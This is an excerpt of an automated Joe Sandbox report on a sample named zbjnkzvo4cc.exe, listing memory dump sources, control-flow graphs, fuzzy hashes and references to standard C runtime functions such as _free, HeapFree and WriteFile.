                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: dcdc01861363e9c5ac544f3c56f389d5af500d18b10cee118274b4900a87bff4
                                                                                                                                                            • Instruction ID: 7e80186f1c64bf3bffedfc886f54cefdd87f2c5fdcac882b7f8c13de1aeb176b
                                                                                                                                                            • Opcode Fuzzy Hash: dcdc01861363e9c5ac544f3c56f389d5af500d18b10cee118274b4900a87bff4
                                                                                                                                                            • Instruction Fuzzy Hash: A9010E3C56D24146D26CEB34C8E09BE73E46F51208FD0162CA1CB52560FF306B4DDA65
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                                                                                                            • Instruction ID: 40a9e04cd24a2587aace1d92f071d9f3518d960cfe02c2a637d27d2e8c9dae4a
                                                                                                                                                            • Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                                                                                                            • Instruction Fuzzy Hash: D9E08C32A11228EBCB11CB9CC904D8AF3FCEB45B84B5144A7B515E7210E272DE00D7C0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bac9d5e7f0551d8b6b2862464ec7429cf04cd1b6a89c4bf5841f13d2509b1f92
                                                                                                                                                            • Instruction ID: deb99c5aec674ff5a8173177a246bc48ea6abd5ec8f88eb922bdb0f347157fc0
                                                                                                                                                            • Opcode Fuzzy Hash: bac9d5e7f0551d8b6b2862464ec7429cf04cd1b6a89c4bf5841f13d2509b1f92
                                                                                                                                                            • Instruction Fuzzy Hash: EDD0A7FEF8210047D708DB34EC42562AA6746DB10870CE030DA02C7786FF3DD40B8449
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e63e306e247e8ddd34d53438d9caa76178b163fcefc3e3770fea4f7d69f650c2
                                                                                                                                                            • Instruction ID: 09128053b4bb38be0f814a924dbffe7ba151b7557ef497de6f85f1ca1e1391c9
                                                                                                                                                            • Opcode Fuzzy Hash: e63e306e247e8ddd34d53438d9caa76178b163fcefc3e3770fea4f7d69f650c2
                                                                                                                                                            • Instruction Fuzzy Hash: C1A00225F482048E43509F10D681C76E2337387601F21B6219898332148325D48AD64D

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1909 68c06958-68c0696c 1910 68c069da-68c069e2 1909->1910 1911 68c0696e-68c06973 1909->1911 1913 68c069e4-68c069e7 1910->1913 1914 68c06a29-68c06a41 call 68c06ac9 1910->1914 1911->1910 1912 68c06975-68c0697a 1911->1912 1912->1910 1916 68c0697c-68c0697f 1912->1916 1913->1914 1915 68c069e9-68c06a26 call 68c04273 * 4 1913->1915 1924 68c06a44-68c06a4b 1914->1924 1915->1914 1916->1910 1919 68c06981-68c06989 1916->1919 1922 68c069a3-68c069ab 1919->1922 1923 68c0698b-68c0698e 1919->1923 1926 68c069c5-68c069d9 call 68c04273 * 2 1922->1926 1927 68c069ad-68c069b0 1922->1927 1923->1922 1928 68c06990-68c069a2 call 68c04273 call 68c08887 1923->1928 1929 68c06a6a-68c06a6e 1924->1929 1930 68c06a4d-68c06a51 1924->1930 1926->1910 1927->1926 1932 68c069b2-68c069c4 call 68c04273 call 68c08985 1927->1932 1928->1922 1933 68c06a70-68c06a75 1929->1933 1934 68c06a86-68c06a92 1929->1934 1937 68c06a53-68c06a56 1930->1937 1938 68c06a67 1930->1938 1932->1926 1941 68c06a83 1933->1941 1942 68c06a77-68c06a7a 1933->1942 1934->1924 1944 68c06a94-68c06a9f call 68c04273 1934->1944 1937->1938 1946 68c06a58-68c06a66 call 68c04273 * 2 1937->1946 1938->1929 1941->1934 1942->1941 1951 68c06a7c-68c06a82 call 68c04273 1942->1951 1946->1938 1951->1941
                                                                                                                                                            APIs
                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 68C0699C
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C088A4
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C088B6
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C088C8
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C088DA
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C088EC
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C088FE
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C08910
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C08922
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C08934
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C08946
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C08958
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C0896A
                                                                                                                                                              • Part of subcall function 68C08887: _free.LIBCMT ref: 68C0897C
                                                                                                                                                            • _free.LIBCMT ref: 68C06991
                                                                                                                                                              • Part of subcall function 68C04273: HeapFree.KERNEL32(00000000,00000000,?,68C034AC), ref: 68C04289
                                                                                                                                                              • Part of subcall function 68C04273: GetLastError.KERNEL32(?,?,68C034AC), ref: 68C0429B
                                                                                                                                                            • _free.LIBCMT ref: 68C069B3
                                                                                                                                                            • _free.LIBCMT ref: 68C069C8
                                                                                                                                                            • _free.LIBCMT ref: 68C069D3
                                                                                                                                                            • _free.LIBCMT ref: 68C069F5
                                                                                                                                                            • _free.LIBCMT ref: 68C06A08
                                                                                                                                                            • _free.LIBCMT ref: 68C06A16
                                                                                                                                                            • _free.LIBCMT ref: 68C06A21
                                                                                                                                                            • _free.LIBCMT ref: 68C06A59
                                                                                                                                                            • _free.LIBCMT ref: 68C06A60
                                                                                                                                                            • _free.LIBCMT ref: 68C06A7D
                                                                                                                                                            • _free.LIBCMT ref: 68C06A95
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                            • Opcode ID: 18cc07e6fb2a7e21ec4b39073013fc9f57eede2678f9f74402c66276dea3882b
                                                                                                                                                            • Instruction ID: 9c4e089ede096509a5d03ce073d904a9a51f6264c5ae1e66a28aeb72856cde60
                                                                                                                                                            • Opcode Fuzzy Hash: 18cc07e6fb2a7e21ec4b39073013fc9f57eede2678f9f74402c66276dea3882b
                                                                                                                                                            • Instruction Fuzzy Hash: 13314E31A04B01DFEB219E7DD844F6777E8EF00398F90842AE568D6154FB72EA91D714

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1996 68c03b33-68c03b46 1997 68c03b52-68c03bff call 68c04273 * 9 call 68c0395f call 68c039ca 1996->1997 1998 68c03b48-68c03b51 call 68c04273 1996->1998 1998->1997
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                            • Opcode ID: a0839b4c5ac9cdf69949d58bf7ed97553edef6fba0b4c4f7d0b22161205533a4
                                                                                                                                                            • Instruction ID: b3f4e8051b2bc86899d929532140332440538ad3085468b902fd495512a4c1f1
                                                                                                                                                            • Opcode Fuzzy Hash: a0839b4c5ac9cdf69949d58bf7ed97553edef6fba0b4c4f7d0b22161205533a4
                                                                                                                                                            • Instruction Fuzzy Hash: 1E219B7AD04108EFCF51DFA8C840DEE7BB5BF18284F404165A9159B125EB72DB44DB84
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: C$C$E$F$J$M$T$[$^$_$x
                                                                                                                                                            • API String ID: 0-1009912999
                                                                                                                                                            • Opcode ID: bb28aaa3528739d5f0807518c9aed68cc9302566c67dc8b84305165392623b74
                                                                                                                                                            • Instruction ID: a0dba346576d774b4c802658327738a210f6c665e533122f89a807ea28bd6cad
                                                                                                                                                            • Opcode Fuzzy Hash: bb28aaa3528739d5f0807518c9aed68cc9302566c67dc8b84305165392623b74
                                                                                                                                                            • Instruction Fuzzy Hash: 1A4161B154C7818FD300AF78D88835FBFE0AB92214F48493DE5D587382E679858AC797
                                                                                                                                                            APIs
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 68C02147
                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 68C0214F
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 68C021D8
                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 68C02203
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 68C02258
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                            • Opcode ID: e776a42d4add9f75ca43a627dc7d3932047b6bf6a9cfd8e6800f25ecc199203c
                                                                                                                                                            • Instruction ID: 77f7a6cb61cc0c674c8a84316f88ba85db1b714d08f5af3bf2a9a311bc11a154
                                                                                                                                                            • Opcode Fuzzy Hash: e776a42d4add9f75ca43a627dc7d3932047b6bf6a9cfd8e6800f25ecc199203c
                                                                                                                                                            • Instruction Fuzzy Hash: C94199349002089FCF06CF5CCC64A9EBBB5AF493A8F908155E9246B391E773DA56CB91
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 0-537541572
                                                                                                                                                            • Opcode ID: ae9df7b812eb65ec01da5ff557c998bce975fb65d82c9ad6f88257885c9d9404
                                                                                                                                                            • Instruction ID: 8b8a918a42edc186faf2beac05d7677597c5b6e35152eead6bbd9154ab69a686
                                                                                                                                                            • Opcode Fuzzy Hash: ae9df7b812eb65ec01da5ff557c998bce975fb65d82c9ad6f88257885c9d9404
                                                                                                                                                            • Instruction Fuzzy Hash: C221EB31A85215EBDB118A6D8C44B1E3B78AF027E4F610725ED35BB691F633D901D5E0
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 68C089EE: _free.LIBCMT ref: 68C08A13
                                                                                                                                                            • _free.LIBCMT ref: 68C08A74
                                                                                                                                                              • Part of subcall function 68C04273: HeapFree.KERNEL32(00000000,00000000,?,68C034AC), ref: 68C04289
                                                                                                                                                              • Part of subcall function 68C04273: GetLastError.KERNEL32(?,?,68C034AC), ref: 68C0429B
                                                                                                                                                            • _free.LIBCMT ref: 68C08A7F
                                                                                                                                                            • _free.LIBCMT ref: 68C08A8A
                                                                                                                                                            • _free.LIBCMT ref: 68C08ADE
                                                                                                                                                            • _free.LIBCMT ref: 68C08AE9
                                                                                                                                                            • _free.LIBCMT ref: 68C08AF4
                                                                                                                                                            • _free.LIBCMT ref: 68C08AFF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                            • Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                                                                                                            • Instruction ID: aedcd4422cb6fac55acc61ec7aff51eb7a98c396ff824e379ce1e7b745fb777a
                                                                                                                                                            • Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                                                                                                            • Instruction Fuzzy Hash: A2112475980B04B6D930FFB4CC06FEF7B9CAF04748FC08815A699A6050EB66F6049761
                                                                                                                                                            APIs
                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 68C07B87
                                                                                                                                                            • __fassign.LIBCMT ref: 68C07D6C
                                                                                                                                                            • __fassign.LIBCMT ref: 68C07D89
                                                                                                                                                            • WriteFile.KERNEL32(?,68C06323,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 68C07DD1
                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 68C07E11
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 68C07EB9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1735259414-0
                                                                                                                                                            • Opcode ID: 0e9ef23d7ffb90e463042c48cc7a58aa794722132e74e895db23d73b69b083dd
                                                                                                                                                            • Instruction ID: 29b5b26d1dfbb0ee61333cc0a8c8cb85f9f022af936a7414236d4aa7cb62d940
                                                                                                                                                            • Opcode Fuzzy Hash: 0e9ef23d7ffb90e463042c48cc7a58aa794722132e74e895db23d73b69b083dd
                                                                                                                                                            • Instruction Fuzzy Hash: D7C19C75D052589FCB05CFACC8809EDFBB9BF09354F68416AE865B7341E632AD42CB60
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(00000001,?,68C022B5,68C013E0,68C00DF9,?,68C01031,?,00000001,?,?,00000001,?,68C10120,0000000C,68C0112A), ref: 68C025F5
                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 68C02603
                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 68C0261C
                                                                                                                                                            • SetLastError.KERNEL32(00000000,68C01031,?,00000001,?,?,00000001,?,68C10120,0000000C,68C0112A,?,00000001,?), ref: 68C0266E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                            • Opcode ID: d7ce4078fb69be951b4eac7298a38b899052789e3153bcab7c518c13fe7b149a
                                                                                                                                                            • Instruction ID: 0acc66d61030df0dc6f18ebac8c56c09687c72fc951e92555293f8e29f646412
                                                                                                                                                            • Opcode Fuzzy Hash: d7ce4078fb69be951b4eac7298a38b899052789e3153bcab7c518c13fe7b149a
                                                                                                                                                            • Instruction Fuzzy Hash: D201B5376187119EAA17197D6C68D5A2769EB0F7F9FA0032AE230511E0FFD388156144
                                                                                                                                                            Strings
                                                                                                                                                            • C:\Windows\Temp\zbjnkzvo4cc.exe, xrefs: 68C04AE4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: C:\Windows\Temp\zbjnkzvo4cc.exe
                                                                                                                                                            • API String ID: 0-1163479202
                                                                                                                                                            • Opcode ID: 1232a5b63742a4cc7db092e54bfbba7c71891be1da13313f60372fb49be0c6b0
                                                                                                                                                            • Instruction ID: 804929b651f46b104c191eae9ad374e890fc7fad0c62391478f698b386aad602
                                                                                                                                                            • Opcode Fuzzy Hash: 1232a5b63742a4cc7db092e54bfbba7c71891be1da13313f60372fb49be0c6b0
                                                                                                                                                            • Instruction Fuzzy Hash: 6C218075604905AF9B309F6DDC84E2B77ADAB213EC7904614F974E7240F732EC1187A0
                                                                                                                                                            APIs
                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,68C02824,00000000,?,00000001,00000000,?,68C0289B,00000001,FlsFree,68C0BD3C,FlsFree,00000000), ref: 68C027F3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 3664257935-2084034818
                                                                                                                                                            • Opcode ID: 73a7c6f0f9dd5f21632894ac029bf937b7b6361475ebcd86366a9331b1f23d19
                                                                                                                                                            • Instruction ID: e1c5926610bef2ba99efd87fb39179659047de8ab54fe7b02e4ee77033f5c872
                                                                                                                                                            • Opcode Fuzzy Hash: 73a7c6f0f9dd5f21632894ac029bf937b7b6361475ebcd86366a9331b1f23d19
                                                                                                                                                            • Instruction Fuzzy Hash: 6511C635A45629EBDF238A6CDC54B4D33B5BF0A7E4F620111E920F7281F772E90186E1
                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,68C02DCC,?,?,68C02D94,?,00000001,?), ref: 68C02E2F
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 68C02E42
                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,68C02DCC,?,?,68C02D94,?,00000001,?), ref: 68C02E65
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
                                                                                                                                                            • Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                            • Opcode ID: b3ae170599ff8c6395bcaf7fe37ab98f83e222cf852ae3236057a44d1b716ded
                                                                                                                                                            • Instruction ID: f23f64d9df5ea4c71eb70851020876cefe7f88e8d027dbb0c2c0ac9bc8169439
                                                                                                                                                            • Opcode Fuzzy Hash: b3ae170599ff8c6395bcaf7fe37ab98f83e222cf852ae3236057a44d1b716ded
                                                                                                                                                            • Instruction Fuzzy Hash: 31F05830541219FBDF12DB54CD19B9E7A79EB046DAF610068A534B2250EB32CE01DB90
                                                                                                                                                            APIs
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 68C074BB
                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 68C07581
                                                                                                                                                            • __freea.LIBCMT ref: 68C075ED
                                                                                                                                                              • Part of subcall function 68C065EC: HeapAlloc.KERNEL32(00000000,68C06323,68C06323,?,68C05023,00000220,?,68C06323,?,?,?,?,68C08441,00000001,?,?), ref: 68C0661E
                                                                                                                                                            • __freea.LIBCMT ref: 68C075F6
                                                                                                                                                            • __freea.LIBCMT ref: 68C07619
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true
